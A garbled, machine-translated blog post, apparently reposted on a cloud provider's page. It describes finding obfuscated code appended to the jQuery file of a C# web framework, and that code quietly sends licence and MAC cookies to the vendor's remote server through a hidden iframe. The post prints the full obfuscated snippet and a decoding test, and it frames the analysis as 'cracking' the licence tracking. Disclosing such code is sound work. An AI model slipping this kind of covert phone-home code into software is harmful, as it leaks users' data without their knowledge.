A great god C # Framework for the background send information search and crack

Source: Internet
Author: User

Recently in the blog Park wandering around, found a big God released a C # framework, a look at the framework, called the frame, ah, installed B effect is very good, the interface is very cool, although there are many components are not perfect, but, can be initially applied to the project.

First look at the interface:

At the time of testing, when testing with a browser, a problem is found that the program will proactively send some information to the background. The information is as follows:

1, Http://www.nfine.cn:8099/NFineWatch/signalr/hubs
2, http://www.nfine.cn:8099/nfinewatch/signalr/negotiate?clientprotocol=1.5&userid=95b81fa6-710d-8d03-788a- 880d01c68865&connectiondata=%5b%7b%22name%22%3a%22chatshub%22%7d%5d&_=1477271227181
3, http://www.nfine.cn:8099/nfinewatch/signalr/connect?transport=serversentevents&clientprotocol=1.5& userid=95b81fa6-710d-8d03-788a-880d01c68865&connectiontoken=b5z%2bxauoquji6auxi93wacrs2lvi3u0bwp7xs1h% 2b6rylqfckspzofnlox59huhux6s6tsrotdax8ewu99r7qh90bisk7snqmfc8zeogijjhfggss%2fzf%2fz9ioxhkbbgks& Connectiondata=%5b%7b%22name%22%3a%22chatshub%22%7d%5d&tid=0
4, http://www.nfine.cn:8099/nfinewatch/signalr/start?transport=serversentevents&clientprotocol=1.5& userid=95b81fa6-710d-8d03-788a-880d01c68865&connectiontoken=b5z%2bxauoquji6auxi93wacrs2lvi3u0bwp7xs1h% 2b6rylqfckspzofnlox59huhux6s6tsrotdax8ewu99r7qh90bisk7snqmfc8zeogijjhfggss%2fzf%2fz9ioxhkbbgks& connectiondata=%5b%7b%22name%22%3a%22chatshub%22%7d%5d&_=1477271227278
5, http://www.nfine.cn:8099/nfinewatch/signalr/send?transport=serversentevents&clientprotocol=1.5& userid=95b81fa6-710d-8d03-788a-880d01c68865&connectiontoken=b5z%2bxauoquji6auxi93wacrs2lvi3u0bwp7xs1h% 2b6rylqfckspzofnlox59huhux6s6tsrotdax8ewu99r7qh90bisk7snqmfc8zeogijjhfggss%2fzf%2fz9ioxhkbbgks& connectiondata=%5b%7b%22name%22%3a%22chatshub%22%7d%5d

Then, through this information, it can be determined that the program is not authorized to use.

However, the means of encryption through the full text lookup and search find, there is no result, and then a guess, since the plaintext is not found, it can only be explained when the encryption.

Then open the browser debugging function, a catch, found to be with SIGNALR in and server communication, if it is the same as signalr to communicate with the server, that is, the JS code, mainly in jquery after,

<link href= "~/content/css/framework-font.css" rel= "stylesheet"/>
<link href= "~/content/css/framework-login.css" rel= "stylesheet"/>
<script src= "~/content/js/jquery/jquery-2.1.1.min.js" ></script>
<script src= "~/content/js/cookie/jquery.cookie.js" ></script>
<script src= "~/content/js/md5/jquery.md5.js" ></script>

A look, jquery after the file is very few, so the first is to open jquery this file for review, and then guess the general back-end development will rarely go to change jque intermediate files, general change is at the end, and then open notepad++ to view, jump directly to the end, found the following code:

(function($) {$.ABCD={getcookie:function(a) {varB, C =NewRegExp ("(^|)" + A + "= ([^;] *)(;|$)");if(b = Document.cookie.match (c)) {returnUnescape (b[2])}Else{return NULL}}, execute:function () {            Try {                if(Top.$.wdversion = =undefined) {top.$.wdversion= ""; varA = $.abcd.getcookie ("Dfine_mac");varb = $.abcd.getcookie ("dfine_licence");varc = decodeuricomponent (Window.atob ("ahr0cdovl3d3dy5uzmluzs5jbjo4mdk5l05gaw5lv2f0y2gvmjaxnja4mdeuahrtba=="));varD = Window.atob ("awzyyw1lanmwmdawmq==");varf = decodeuricomponent (Window.atob (" jtndawzyyw1ljtiwawqlm0qlmjjpznjhbwvqczawmdaxjtiyjtiwjtiwc3r5bgulm0qlmjjkaxnwbgf5jtnbbm9uzsuymiuymcuzrsuzqy9pznjhbwulm0u ="));varg = "";if(Top.$ ("#" + D). Length <= 0) {top.$ ("body"). Append (f); Window.settimeout (function() {Top.$.wdkey = {userkey:b, macs:a};if(Top.$.wdkey! = undefined) {g = Window.btoa (Json.stringify (Top.$.wdkey))}; top.$ ("#" + D). attr ("src", C + "? =" + G)}, 6000) }                }            } Catch(e) {}}, init:function() {$.abcd.execute ()}}; $(function() {$.abcd.init ()})}) (jQuery);

A look, incredibly we can not understand, and then, guess is this piece of code.

Then write a simple test program to verify:

        function test () {            var c = decodeuricomponent (Window.atob (" ahr0cdovl3d3dy5uzmluzs5jbjo4mdk5l05gaw5lv2f0y2gvmjaxnja4mdeuahrtba== "));            var d = Window.atob ("awzyyw1lanmwmdawmq==");            var f = decodeuricomponent (Window.atob (" jtndawzyyw1ljtiwawqlm0qlmjjpznjhbwvqczawmdaxjtiyjtiwjtiwc3r5bgulm0qlmjjkaxnwbgf5jtnbbm9uzsuymiuymcuzrsuzqy9pznjhbwulm0u ="));            Console.log (c);            Console.log (d);            Console.log (f);        }

Browser output: One look is it.

The code of the people, to keep the residual fragrance (Http://http://www.nfine.cn/)

Experience Address: (official website) http://www.nfine.cn/, (modified) www.yuechifan.net

Finally, thank you very much for their contribution to open source.

A great god C # Framework for the background send information search and crack

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.